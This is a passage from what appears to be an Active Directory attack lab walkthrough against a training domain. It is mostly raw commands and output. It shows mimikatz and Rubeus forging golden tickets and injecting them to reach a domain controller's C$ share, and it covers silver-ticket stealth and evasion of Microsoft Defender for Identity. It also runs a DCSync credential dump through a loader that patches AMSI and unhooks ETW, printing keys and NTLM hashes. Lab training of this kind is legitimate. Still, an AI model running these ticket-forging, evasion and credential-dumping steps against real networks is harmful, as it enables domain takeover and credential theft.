'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512
/startoffset:0 /endin:600 /renewmax:10080 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *512
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 6/28/2024 5:05:27 AM ; 6/28/2024 3:05:27 PM ; 7/5/2024 5:05:27 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

mimikatz(commandline) # exit
Bye!
PS C:\Windows\system32> klist

Current LogonId is 0:0x1a49c2

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:05:27 (local)
End Time: 6/28/2024 15:05:27 (local)
Renew Time: 7/5/2024 5:05:27 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\Windows\system32> ls \\dcorp-dc\C$\

Directory: \\dcorp-dc\C$

Mode LastWriteTime Length Name

---- ------------- ------ ----
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 11/14/2022 10:12 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 5/18/2024 1:32 AM Users
d----- 1/10/2024 12:59 AM Windows

Using Rubeus
With Rubeus, we can generate an OPSEC friendly command for Golden ticket. 3 LDAP queries are sent to
the DC to retrieve the required information.

Generating OPSEC friendly command:

C:\AD\Tools\Rubeus.exe golden /aes256:<Hash of the user> /sid:<domain sid> /ldap /user:<user to
impersonate> /printcmd

C:\Windows\system32>C:\AD\Tools\Rubeus.exe golden
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /printcmd

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGT

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 6/28/2024 5:35:28 AM

[*] StartTime : 6/28/2024 5:35:28 AM
[*] EndTime : 6/28/2024 3:35:28 PM
[*] RenewTill : 7/5/2024 5:35:28 AM

[*] base64(ticket.kirbi):

doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BHowggR2oAMCARKhAwIBA6KCBGgEggRk0LgSdq+jiCQICB+HqMaCRtaZZoi7/yV7EiLtqb7maWiy7GAV
 p7U6aT3N/TgqqK/OjjMG9V3zAC7nwzdOUP8YTNLOCy7zo4HGSSHFYKM4M5Zv1o0/qHmhCSMvVIsbI0WQ
ClEoVetkAMx2d25c8DI01UOjEMnXKAPKbejbXeY+DVLxN7rZQcYdOcRLDYtyEx3XSFfS5FdSp04ejL/z
mLXJbxf+E32fzHO3bL321vr+PR0T4iKGVLQrIHF3lV06je6MT8g9Y0UEUgpu+rJwF4fsLM+FHb6dre3Y
s16alH7HTHa7IxpL/grxYSek28Z8uGqUP6+liXhVSC6WG81CFY/ETCySyZBERCaYZrozBhlDLg/4LTmR
awyOT/7okTm71CwhtBol/qzoEH2ZhdCJq7gFFdXqf2GIfbmrE7BaQ6SsguPluIeMDsiY8G5M9VC0gUwM
hiwOs5AuiQqvGvs4c8+fNYCj5wbSv2XkKhAHhwRg10LbMoaFsKC5u8ivVj7sJddSCh1ajypGQAeyMU0B
MCF/r+mHIVH6Qkif6b6GYl/wMfTf+7OZISkBOJ53C6rUnGEPxTs0r0QvJWv3ycPLqXhrEA8SGZKpxGPy
9xX41h92l3FrVdObv+vmaTPCJtQqCzfBV96Y3sAaJjxbLXCKnUFzVMj/SBUtgi3cLsoc5QtnEdm1Ijuj
Mb/C9iqQYxYT1rPd2XJG927axcDqNDS8HOvXVto0y35CyWfBqRT7r4w2Xa6xpLhCJamaU8y8JC0nuioq
eiopWXL28Wc3NmaHbp9fxs5LFZ5TdmiAC/WB3nTq+WNYYdgv9SpbiXSv/Oz9qo1m7uzXAKLTx9t9AGHz
50Zyz0br63fYaR3WdJNhNAG1uoHZTq73D+KPlBvqaagHNFCahonXnz6AM4weJMbtM5/ztIc0dxmfHtYG
zhqSHK4paP3soii7IIsSrZFCXxYNJ1AsaEh9hiZW2sZfCE49G0KKh1OcaeqGwZyWFhwk/J71Vp4xzJJU
C+VJj2u00bzMAIET44JiBTf57SzotS+e+fEellGDVz1ehgifa4g8/6tTb/iaDyYnLnaJkhfDn6WAKLnR
Hbs3ziosGcRES/KFo8XHIrblNboSvbtxTde3t9C7nSjkIKBqi7/4ZneU/oVHgqs+sHIQp+fP6ff7g6mr
WDPt84QE7x4dQheTUjExwlj71l8t33KOalMcp1ttbG2HAShbgqnsV2iYDi59VtvIg2inl5tVTP8svRnw
bqNzR5848efE3LPxE8kWe5AcnpXcsxtuezTa9tbEgsscznzkFraxKbc6NNivMtsWTueD6mMDvw8qoCAL
XPnPsYntW/6ZkijA2Dgz4c2zDdjUEwoLEjct9HcK88JxPU2xsUrcStiY0FNDK2ecW7SPmX1gQjmLfjl2
K64v4f22BkiKBxO2HSMdZD5YDwLfMN6f9km+/PCMVtCTJXOk4n6gIRquIYEOdDpd0DfoK6R3/I867cTA
aC6gjj9IjVOjggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
BCAbXLwCDWyi8Gyporav9zGzf2ixCpOxxQTr+hArmhZ7CaEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNDA2MjgxMjM1Mjha
pREYDzIwMjQwNjI4MTIzNTI4WqYRGA8yMDI0MDYyODIyMzUyOFqnERgPMjAyNDA3MDUxMjM1MjhaqBwb
GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
Lm1vbmV5Y29ycC5sb2NhbA==

[*] Printing a command to recreate a ticket containing the information used within this ticket

C:\AD\Tools\Rubeus.exe golden
/aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator
/id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:190 /netbios:dcorp
/groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local
/uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD

We can execute the printed command to forge a golden ticket. To inject the ticket into the present section
we use the /ptt parameter.
C:\Windows\system32>dir \\dcorp-dc\C$\
Access is denied.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe golden
/aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator
/id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:190 /netbios:dcorp
/groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local
/uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1
[*] Action: Build TGT

[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)

[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local

[*] Generating EncTicketPart

[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for '[email protected]'

[*] AuthTime : 6/28/2024 5:41:26 AM

[*] StartTime : 6/28/2024 5:41:26 AM
[*] EndTime : 6/28/2024 3:41:26 PM
[*] RenewTill : 7/5/2024 5:41:26 AM

[*] base64(ticket.kirbi):

doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BHowggR2oAMCARKhAwIBA6KCBGgEggRkoM6CEs7jMgBoCoyP/EfANXDtEdlLY03s76N2JlclMM7GYAj1
S+lsFxd5+tpQTqaFFaHodgPfYYGP8sY+Ak/Eb0BghJV/d3XV4hxogJVeUoO/h++QE9D0djkO/YdgTpT5
b/UAJM+fF7BmFyO3tvuIC5AID7bJxu6X1WqosC9PX0+h2WWNBX/ATdsNLota3CJubuNjp2opl5YD70cd
rVUm8VeqiqoVEmMJLvc4O0Tor/FlyMbyq7jKmp42yduVDdg08tRmBvOVJP9Zrmj1gIieMsesnxhNPTUm
6igr5vZysU5TQxvibzchqE7N8u1W307yrRbU3klOnWqmqu4N98Nn3GdWDZ4c1Yvb15pAChR38PBV5a9s
TSYSXpAqbJHovdfqa8vQJFVDinMCTDOuepUg4gP/qSMFee/OJM1jp3NvP+Ya9hvoZHW3w1jlP44cwcq7
aJJyeKWPsLDwo4pUnF3kK3fl57sdOnyeOixlIgwU/CRqrTB6thtJtoC6aLMcDpCIPlXgzc5ihkmw3sT6
pq1jucgP0IL1wG9pfEEUiZ+B9sd41vbS+EhlLrK8ZQ8HWPNkG+xBYY8icKGYqL6enIrIycsbCVzkCIGa
hwkdz5lavl5PbNfMPNkGsHBizkZTdjEK3v/o92ViRpLA4eC4BNdksb+A1rS7fkRrZ4K1YJliGNugTMvk
RN9AmQxOfhFFc0VpnXnjVDaSlh0sOgkNJWz9AFZbS77kut/Ixp+ad2qPPs5r2E7yqt0yEhvFq3nijtIJ
nY234KCIq8PZ6BePtZoY4UqF3hGNAsa+NVwk3UYr79Fjuo4Y3qOGYbrhB/zGPk9KiExXiL/hBrPGx44w
RAd1GV2P73XnjGPPqwaH1dymd9AAZHZTAK+Bl+0G5OkQjuqB8m4FlRGw+bv83OEKPK8qyqGeQx5tfagz
e1ByZ9r43FzALBEhzzhWsAeMUnHR0kv9adC3Me2FNJZOvv/+AKTXCpdXhtuDde6fF/id0DIcncoIidm+
iB0OEfEVaXfPOTOTLB4kK5gcttu8Ef5vFbIpSZTMYZX409E4tQXQr1Bu7r8Any8OYINIPpStMPJ91FZ+
NhEs04eL3q14yM1v+RsputoHsA/8VHbuSngru1Y1jKyunrNSaaJ4CkoPxX33FUyLRBGnYOFbApTY0t4c
mLIB+CSXqxK+LtQ3SnLgg3hQVOZknn1mXzGiGC6FMS02jbDHZJaWu6aqDL9q96O74l++yo4mfjp5Nmmt
bI9elmvzbNr82CUWJJoJz5+qzlHearjhXWTk4T/LRSyKstGebtgnP5MghWWPqrog/VBkUzT3CJp7Gu3U
QTQe7wdGijy3v0lWyd7sSBOC3EsJEk3JOd+IBOvvflZJNCRWY2Gma3eh1Y17ARJ5nPH/7Cb6o/8hH+D8
d2g09EpWM6hldKpb6h4BzPTfRP2w44UG+JUU87hmLq4vU9hiQYQSv+LZ7uxMR1MyeNCYOvApsWRheAUY
8Enqu+qhN86jggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
BCDw0ChP933+UBafQ1AZxvDoDubs3JvlVevSjCpUHSKPsqEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNDA2MjgxMjQxMjZa
pREYDzIwMjQwNjI4MTI0MTI2WqYRGA8yMDI0MDYyODIyNDEyNlqnERgPMjAyNDA3MDUxMjQxMjZaqBwb
GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
Lm1vbmV5Y29ycC5sb2NhbA==

[+] Ticket successfully imported!

C:\Windows\system32>
C:\Windows\system32>klist

Current LogonId is 0:0x1f7ba7

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL

Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 6/28/2024 5:41:26 (local)
End Time: 6/28/2024 15:41:26 (local)
Renew Time: 7/5/2024 5:41:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc\C$\
Volume in drive \\dcorp-dc\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc\C$

05/08/2021 01:20 AM <DIR> PerfLogs

11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,428,753,920 bytes free

Persistence
Once a Golden Ticket is created and used, the attacker can:

• Maintain Long-Term Access: Golden Tickets can have very long lifetimes, providing extended
access since the KRBTGT’s password is changed very rarely.

• Bypass Password Changes: Even if the user account passwords are changed, the Golden Ticket
remains valid until the KRBTGT password is changed.

• Impersonate Any User: The attacker can forge TGTs for any user, giving them flexibility in their
attacks.

To invalidate any existing Golden Tickets, the KRBTGT’s password twice as password history is maintained
for the account.

Silver ticket attack

A Silver Ticket attack is a type of Kerberos attack where an attacker forges service tickets (TGS) rather than
Ticket Granting Tickets (TGT). This allows the attacker to access specific services without needing to
interact with the domain controller, making it a stealthier attack compared to Golden Ticket attacks. Silver
Tickets can be used to authenticate to any service that uses Kerberos for authentication, such as MSSQL,
HTTP, or CIFS.

The attack requires the NTLM hash (or password) of a service account that is trusted by the service. We
also need the Service Principal Name (SPN) of the service you are targeting.

Stealthiness of Silver Tickets

Silver Ticket attacks can be highly stealthy, especially when compared to other types of attacks on an
Active Directory (AD) environment. Microsoft Defender for Identity (MDI) and other detection tools may
not always detect these attacks due to their nature.

Service-Specific Tickets
• Silver Tickets are created for specific services (e.g., CIFS, HTTP) and do not require communication
with a Domain Controller (DC) to be used.

• This reduces the likelihood of detection by security monitoring tools that track DC interactions.

Limited Scope
• Unlike Golden Tickets, which provide unrestricted access across the domain, Silver Tickets are
limited to specific services on specific machines.

• This limitation inherently makes them less suspicious and harder to detect.

Avoiding Domain Controller Logs

• Since Silver Tickets do not need to interact with the Key Distribution Center (KDC) on the DC for
validation, they avoid generating logs and alerts that would typically be associated with Kerberos
ticket activity.

MDI Evasion
• Microsoft Defender for Identity primarily monitors authentication traffic and anomalies at the DC
level.

• By using Silver Tickets, attackers can access services on a domain controller without triggering the
same level of scrutiny as they would with a Golden Ticket.

Dumping Credentials of the service accounts

Since CIFS, WMI and PowerShell remoting uses the Local machine account as the service account, we will
dump the hashes of the Local machine account of the Domain Controller.

Dumping NTLM Hashes

We have already dumped all the hashes from the Domain Controller. For this we can refer to the section
Dumping All the Hashes from Domain Controller. From the output of the command, the NTLM hash of the
machine account of the Domain Controller can be obtained.
RID : 000003e8 (1000)
User : DCORP-DC$
LM :
NTLM : 81a9ccc2f44b988af78448ad78297ad5
Dumping AES Keys
If we want the AES keys, then we can execute the DCSync attack against the machine account of the
Domain Controller.

Opening a command prompt with Domain Administrator (svcadmin) privileges.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : NREMAWFI
[*] Domain : 8N5W5RXM
[*] Password : 8QC3E8E0
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1928
[+] LUID : 0x37f8e4

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 3668196
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x37f8e4
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 6:55:16 AM
EndTime : 6/28/2024 4:55:16 PM
RenewTill : 7/5/2024 6:55:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : iRGBk/LqgAnl3LG08+WDSFl189UDvEJzRA7LJv+2Za4=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

Executing the DCSync attack to get the AES key of the machine account
C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:DCORP-DC$" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
 localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:DCORP-DC$

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'DCORP-DC$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : DCORP-DC

** SAM ACCOUNT **

SAM Username : DCORP-DC$

Account Type : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration :
Password last change : 6/13/2024 9:01:43 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1000
Object Relative ID : 1000

Credentials:
Hash NTLM: 81a9ccc2f44b988af78448ad78297ad5
ntlm- 0: 81a9ccc2f44b988af78448ad78297ad5
ntlm- 1: 5c005292c95d884d306b78dbaa328cd8
ntlm- 2: 7646f5e39b40c80f806e85d76fa3f950
ntlm- 3: a61ed96763f999c1f790ac0b6f8b1712
ntlm- 4: 268b8d00e7f18cb0bf68cb2b08345ad3
ntlm- 5: 9528de61ea331943d6bfc53c869627b3
ntlm- 6: 68aaa6d7419d74ec06cbd45710a06fbd
